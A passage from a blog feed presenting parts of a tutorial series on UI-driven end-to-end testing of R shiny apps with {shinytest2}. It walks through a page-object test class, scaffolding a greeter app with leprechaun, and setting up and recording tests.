&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; self&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;invisible&lt;/span&gt;(self)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With that class in place, we can rewrite our original test as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app updates user&amp;#39;s name on clicking the button&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: The app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; GreeterApp&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;new&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;enter_username&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; message &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_value&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(message, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Jumping Rivers!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Adding all this design work into setting up your tests might seem like a
lot of unnecessary work. But, it does make it easier to add new tests,
it makes it simpler to keep your tests passing as you refactor your app
and it makes your tests easier to follow.&lt;/p&gt;
&lt;p&gt;If your tests hinder your ability to add new features to your app, or
prevent you from restructuring your app it may be worth restructuring
your test code.&lt;/p&gt;
&lt;p&gt;The source code for the application in its current form can be obtained
from
&lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-shinytest2/part-3-pageobject/" rel="external"&gt;github&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;This blog series was a brief introduction to UI-based end-to-end tests
for web applications and to the new package {shinytest2}. These kinds of
tests are very powerful and with {shinytest2}’s test recorder, they are
relatively easy to construct. But, because the whole app is within their
scope, these tests can be quite frail and difficult to follow. So if you
find that small changes to your app may lead seemingly unconnected tests
to fail, or that keeping your tests passing requires you to make very
similar changes in multiple places, you may benefit from some of the
ideas in this post:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Can you introduce some functions (or POM methods) to clarify what is
happening in each step of your test?&lt;/li&gt;
&lt;li&gt;Can you ensure that the assertion in your test is only comparing
data that is directly relevant to that test?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The shinytest2 vignettes (&lt;a href="https://rstudio.github.io/shinytest2/articles/robust.html" rel="external"&gt;Robust
testing&lt;/a&gt;,
&lt;a href="https://rstudio.github.io/shinytest2/articles/in-depth.html" rel="external"&gt;Testing in
depth&lt;/a&gt;)
discuss some of the ideas in this post in more depth, and with a
slightly different perspective.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>End-to-end testing with shinytest2: Part 2</title><link>https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/</link><pubDate>Thu, 12 Jan 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the second of a series of three blog posts about using the
{shinytest2} package to develop automated tests for shiny applications.
In the posts we will cover&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/" rel="external"&gt;the purpose of browser-driven end-to-end tests for a shiny
developer, and tools (like {shinytest2}) that help implement
them&lt;/a&gt;;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;how to write and run a simple test using {shinytest2} (this post) ;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/" rel="external"&gt;how best to design your test code so that it supports your future
work&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here, we will write a simple shiny app (as an R package) and show how to
generate tests for this app using {shinytest2}. As discussed in the
previous post, {shinytest2} tests your app as if a user was interacting
with it in their browser. The tests generated are application-focussed
rather than component-focussed and so give some overall guarantees on
how the app should behave.&lt;/p&gt;
&lt;p&gt;This post is slightly more technical than the last, and assumes that the
reader is comfortable with creating and unit-testing packages in R, and
with shiny development in general.&lt;/p&gt;
&lt;p&gt;The packages used in this post can be installed as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;devtools&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;leprechaun&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;shinytest2&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;testthat&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;usethis&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="initialising-a-shiny-app-as-a-package-using-leprechaun"&gt;Initialising a shiny app as a package using leprechaun&lt;/h2&gt;
&lt;p&gt;At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;, our shiny
applications are developed as packages. The one used here was generated
with &lt;a href="https://leprechaun.opifex.org/#/" rel="external"&gt;{leprechaun}&lt;/a&gt;. The workflow for
building apps using leprechaun has three main steps.&lt;/p&gt;
&lt;p&gt;First, initialise a new package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a new R package in the directory &amp;#34;shinyGreeter&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_package&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shinyGreeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Second, add a shiny app skeleton using leprechaun’s &lt;code&gt;scaffold()&lt;/code&gt;
function (all subsequent code is evaluated inside the “shinyGreeter”
directory, created above):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add a basic shiny app and leprechaun-derived helper functions etc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;leprechaun&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scaffold&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-end-to-end-testing-shinytest2-part-2"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;Those two steps add all the code for a working (if basic) shiny app. To
run the app requires some additional steps: documenting and loading the
new package. Note that ‘documenting’ the package also ensures that any
dependencies will be made available to the loaded package (for us, if we
ran this app without having called &lt;code&gt;document()&lt;/code&gt; it would fail to find
the &lt;code&gt;shinyApp()&lt;/code&gt; function from {shiny}).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Document the package dependencies etc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;document&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load the package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;load_all&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load (alternative):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - install the &amp;#34;shinyGreeter&amp;#34; package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - then use `library(shinyGreeter)`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, to prove that we have created a working shiny app, we want to
run this skeleton app. For that purpose, leprechaun added a &lt;code&gt;run()&lt;/code&gt;
function to our package as part of the scaffolding process (here, this
is &lt;code&gt;shinyGreeter::run()&lt;/code&gt;). The running app doesn’t actually use the
leprechaun package at all.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Start the app&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Please see the &lt;a href="https://leprechaun.opifex.org/#/" rel="external"&gt;leprechaun
documentation&lt;/a&gt; for further details on
using this package to build your shiny applications.&lt;/p&gt;
&lt;h3 id="adding-some-testable-functionality-to-the-app"&gt;Adding some testable functionality to the app&lt;/h3&gt;
&lt;p&gt;We still need something to test.&lt;/p&gt;
&lt;p&gt;In a leprechaun app, the main UI and server functions are defined in
&lt;code&gt;./R/ui.R&lt;/code&gt; and &lt;code&gt;./R/server.R&lt;/code&gt;, respectively. We will replace the code
that leprechaun added to these files as follows, to give us an app that
responds to user input.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In ./R/ui.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(req) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;textInput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;What is your name?&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;actionButton&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Greet&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;textOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In ./R/server.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;greeting &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderText&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;req&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;greet)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello &amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;isolate&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name), &lt;span style="color:#a5d6ff"&gt;&amp;#34;!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The resulting app (which is based on an app in the {shinytest2}
documentation) is a reactive “Hello, World!” app. The user enters their
name into a text field and, after they click a button, the app prints
out a “Hello ‘user’!” welcome message in response.&lt;/p&gt;
&lt;p&gt;Since we have changed the source code, we have to reload the package
prior to running the app. Then we can manually check that it behaves as
expected.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;document&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;load_all&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="adding-shinytest2-infrastructure-to-our-app"&gt;Adding shinytest2 infrastructure to our app&lt;/h2&gt;
&lt;p&gt;{shinytest2} provides a utility function, similar to those in {usethis},
that adds all the infrastructure needed for it’s use:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_shinytest2&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here, this adds some files to the &lt;code&gt;./tests/testthat/&lt;/code&gt; directory and adds
{shinytest2} as a suggested dependency of the package.&lt;/p&gt;
&lt;p&gt;{shinytest2} requires an entry point into the app-under-test, so that it
knows how to start the app. Typical shiny apps have a top-level &lt;code&gt;app.R&lt;/code&gt;
file (or a combination of &lt;code&gt;global.R&lt;/code&gt;, &lt;code&gt;server.R&lt;/code&gt; and &lt;code&gt;ui.R&lt;/code&gt;) which is
used to run the app. To add {shinytest2} tests to a package, you can
either&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;add a top-level &lt;code&gt;app.R&lt;/code&gt; file (and so convert into a more typical
shiny app structure),&lt;/li&gt;
&lt;li&gt;add an &lt;code&gt;app.R&lt;/code&gt; into a subdirectory of &lt;code&gt;./inst/&lt;/code&gt;,&lt;/li&gt;
&lt;li&gt;or use a function (like the &lt;code&gt;run()&lt;/code&gt; function added by {leprechaun})
that returns the shiny app object&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here, we choose to use the latter approach. See the &lt;a href="https://rstudio.github.io/shinytest2/articles/use-package.html" rel="external"&gt;shinytest2
vignette&lt;/a&gt;
for more details on how to use {shinytest2} with a packaged shiny
application.&lt;/p&gt;
&lt;p&gt;For those who have used {testthat}, the {shinytest2} test cases will
look familiar and are placed in the same &lt;code&gt;./tests/testthat/&lt;/code&gt; directory
as any other {testthat} test scripts. The code for initialising,
interacting with, and assessing the state of your app is written inside
a &lt;code&gt;test_that()&lt;/code&gt; block. Hence, a typical test case might look as follows
(the GIVEN / WHEN / THEN structure is a common pattern in test code, we
use it here to separate the different steps in the test):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;a description of the behaviour that is under test here&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: this background information about the app&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# (e.g., the user has opened the app and navigated to the correct tab)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; shiny_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinyGreeter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;AppDriver&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;new&lt;/span&gt;(shiny_app, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user performs these actions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# (e.g., enters their username in the text field)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt; code to perform the actions &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: the app should be in this state&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# (e.g., a customised welcome message is displayed to the user)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt; code to check that the app is &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; the correct state &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Any user actions that we are replicating in our test are performed by
calling methods / functions on the &lt;code&gt;AppDriver&lt;/code&gt; object (named &lt;code&gt;app&lt;/code&gt; in
the above).&lt;/p&gt;
&lt;h2 id="recording-your-first-test"&gt;Recording your first test&lt;/h2&gt;
&lt;p&gt;A sensible first test for our app would be to ensure that when the user
enters their name into the text box and clicks the button, a greeting is
rendered on the screen. The simplest way to define this test is using
the {shinytest2} test recorder.&lt;/p&gt;
&lt;p&gt;To record a test using {shinytest2} you use &lt;code&gt;shinytest2::record_test()&lt;/code&gt;.
This works without hitch if there is an &lt;code&gt;app.R&lt;/code&gt; or &lt;code&gt;ui.R&lt;/code&gt; / &lt;code&gt;server.R&lt;/code&gt;
combo in your working directory. Since we are working against a package,
we have to tell &lt;code&gt;record_test()&lt;/code&gt; how to run our app:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;load_all&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;record_test&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;())
